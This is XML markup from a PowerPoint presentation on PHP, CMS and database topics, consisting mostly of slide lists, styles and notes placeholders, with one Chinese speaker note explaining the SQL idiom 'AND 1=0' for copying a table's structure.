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1" r:id="rId1"/>
    <p:sldMasterId id="2147483705" r:id="rId2"/>
    <p:sldMasterId id="2147483717" r:id="rId3"/>
    <p:sldMasterId id="2147483731" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId82"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId83"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="818" r:id="rId5"/>
    <p:sldId id="686" r:id="rId6"/>
    <p:sldId id="815" r:id="rId7"/>
    <p:sldId id="852" r:id="rId8"/>
    <p:sldId id="503" r:id="rId9"/>
    <p:sldId id="890" r:id="rId10"/>
    <p:sldId id="664" r:id="rId11"/>
    <p:sldId id="665" r:id="rId12"/>
    <p:sldId id="666" r:id="rId13"/>
    <p:sldId id="684" r:id="rId14"/>
    <p:sldId id="668" r:id="rId15"/>
    <p:sldId id="669" r:id="rId16"/>
    <p:sldId id="803" r:id="rId17"/>
    <p:sldId id="672" r:id="rId18"/>
    <p:sldId id="673" r:id="rId19"/>
    <p:sldId id="674" r:id="rId20"/>
    <p:sldId id="675" r:id="rId21"/>
    <p:sldId id="677" r:id="rId22"/>
    <p:sldId id="820" r:id="rId23"/>
    <p:sldId id="821" r:id="rId24"/>
    <p:sldId id="681" r:id="rId25"/>
    <p:sldId id="682" r:id="rId26"/>
    <p:sldId id="683" r:id="rId27"/>
    <p:sldId id="775" r:id="rId28"/>
    <p:sldId id="891" r:id="rId29"/>
    <p:sldId id="776" r:id="rId30"/>
    <p:sldId id="892" r:id="rId31"/>
    <p:sldId id="893" r:id="rId32"/>
    <p:sldId id="824" r:id="rId33"/>
    <p:sldId id="825" r:id="rId34"/>
    <p:sldId id="777" r:id="rId35"/>
    <p:sldId id="778" r:id="rId36"/>
    <p:sldId id="779" r:id="rId37"/>
    <p:sldId id="826" r:id="rId38"/>
    <p:sldId id="841" r:id="rId39"/>
    <p:sldId id="842" r:id="rId40"/>
    <p:sldId id="850" r:id="rId41"/>
    <p:sldId id="843" r:id="rId42"/>
    <p:sldId id="844" r:id="rId43"/>
    <p:sldId id="849" r:id="rId44"/>
    <p:sldId id="853" r:id="rId45"/>
    <p:sldId id="823" r:id="rId46"/>
    <p:sldId id="793" r:id="rId47"/>
    <p:sldId id="794" r:id="rId48"/>
    <p:sldId id="796" r:id="rId49"/>
    <p:sldId id="887" r:id="rId50"/>
    <p:sldId id="884" r:id="rId51"/>
    <p:sldId id="885" r:id="rId52"/>
    <p:sldId id="886" r:id="rId53"/>
    <p:sldId id="584" r:id="rId54"/>
    <p:sldId id="688" r:id="rId55"/>
    <p:sldId id="689" r:id="rId56"/>
    <p:sldId id="690" r:id="rId57"/>
    <p:sldId id="691" r:id="rId58"/>
    <p:sldId id="692" r:id="rId59"/>
    <p:sldId id="693" r:id="rId60"/>
    <p:sldId id="694" r:id="rId61"/>
    <p:sldId id="700" r:id="rId62"/>
    <p:sldId id="854" r:id="rId63"/>
    <p:sldId id="855" r:id="rId64"/>
    <p:sldId id="701" r:id="rId65"/>
    <p:sldId id="856" r:id="rId66"/>
    <p:sldId id="857" r:id="rId67"/>
    <p:sldId id="702" r:id="rId68"/>
    <p:sldId id="703" r:id="rId69"/>
    <p:sldId id="858" r:id="rId70"/>
    <p:sldId id="872" r:id="rId71"/>
    <p:sldId id="873" r:id="rId72"/>
    <p:sldId id="874" r:id="rId73"/>
    <p:sldId id="875" r:id="rId74"/>
    <p:sldId id="876" r:id="rId75"/>
    <p:sldId id="878" r:id="rId76"/>
    <p:sldId id="879" r:id="rId77"/>
    <p:sldId id="883" r:id="rId78"/>
    <p:sldId id="880" r:id="rId79"/>
    <p:sldId id="882" r:id="rId80"/>
    <p:sldId id="621" r:id="rId81"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="7315200" cy="9601200"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Tahom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0458C"/>
    <a:srgbClr val="FFFF00"/>
    <a:srgbClr val="FF9900"/>
    <a:srgbClr val="CC3300"/>
    <a:srgbClr val="9999FF"/>
    <a:srgbClr val="009900"/>
    <a:srgbClr val="FF00FF"/>
    <a:srgbClr val="CCECFF"/>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95" autoAdjust="0"/>
    <p:restoredTop sz="85799" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="97" d="100"/>
          <a:sy n="97" d="100"/>
        </p:scale>
        <p:origin x="1812" y="84"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="66" d="100"/>
        <a:sy n="66" d="100"/>
      </p:scale>
      <p:origin x="0" y="-13164"/>
    </p:cViewPr>
    <p:sldLst>
      <p:sld r:id="rId1" collapse="1"/>
    </p:sldLst>
  </p:outlineViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="3" d="2"/>
        <a:sy n="3" d="2"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="140" d="100"/>
        <a:sy n="140" d="100"/>
      </p:scale>
      <p:origin x="0" y="-234"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="87" d="100"/>
          <a:sy n="87" d="100"/>
        </p:scale>
        <p:origin x="-1914" y="-9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2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3169705" cy="479740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96636" tIns="48319" rIns="96636" bIns="48319" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="967064" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1300">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4145496" y="0"/>
            <a:ext cx="3169705" cy="479740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96636" tIns="48319" rIns="96636" bIns="48319" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="967064" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1300">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16388" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9121461"/>
            <a:ext cx="3169705" cy="479739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96636" tIns="48319" rIns="96636" bIns="48319" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="967064" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1300">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16389" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4145496" y="9121461"/>
            <a:ext cx="3169705" cy="479739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96636" tIns="48319" rIns="96636" bIns="48319" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="967064" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1300">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{70A61926-2DC5-4891-8960-FD62370D8A91}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22822348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3169705" cy="479740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96636" tIns="48319" rIns="96636" bIns="48319" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="967064" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1300">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4145496" y="0"/>
            <a:ext cx="3169705" cy="479740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96636" tIns="48319" rIns="96636" bIns="48319" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="967064" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1300">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19460" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1260475" y="720725"/>
            <a:ext cx="4800600" cy="3600450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19461" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="975791" y="4559928"/>
            <a:ext cx="5363618" cy="4320861"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96636" tIns="48319" rIns="96636" bIns="4831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462" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9121461"/>
            <a:ext cx="3169705" cy="479739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96636" tIns="48319" rIns="96636" bIns="48319" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="967064" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1300">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19463" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4145496" y="9121461"/>
            <a:ext cx="3169705" cy="479739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="96636" tIns="48319" rIns="96636" bIns="48319" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="967064" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1300">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{55158CBF-4121-4F92-9E38-E421BCEB0D60}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213401849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baike.baidu.com/item/PHP/9337" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/item/CMS/315935"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baike.baidu.com/item/%E5%86%85%E5%AE%B9%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/item/%E6%9C%8D%E5%8A%A1%E5%99%A8" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/item/%E5%8D%9A%E5%AE%A2"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5158CBF-4121-4F92-9E38-E421BCEB0D60}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9101104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5158CBF-4121-4F92-9E38-E421BCEB0D60}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="825089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DC6BBD4A-5CDB-4E5A-B745-31F786255EE0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258888" y="720725"/>
            <a:ext cx="4800600" cy="3600450"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89092" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731844" y="4559928"/>
            <a:ext cx="5851514" cy="4320861"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>AND 1=0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这个条件始终为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，结果不会返回任何数据，只有表结构，可用于快速建表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1054660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5442B1-B98E-4957-AE8F-A1451D9B102A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44034" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258888" y="720725"/>
            <a:ext cx="4800600" cy="3600450"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44035" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="4560570"/>
            <a:ext cx="5852160" cy="4320540"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5921382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6B52C292-C2C7-4F31-A1D1-3E1CA5F9F58B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94211" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258888" y="720725"/>
            <a:ext cx="4800600" cy="3600450"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94212" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731844" y="4559928"/>
            <a:ext cx="5851514" cy="4320861"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
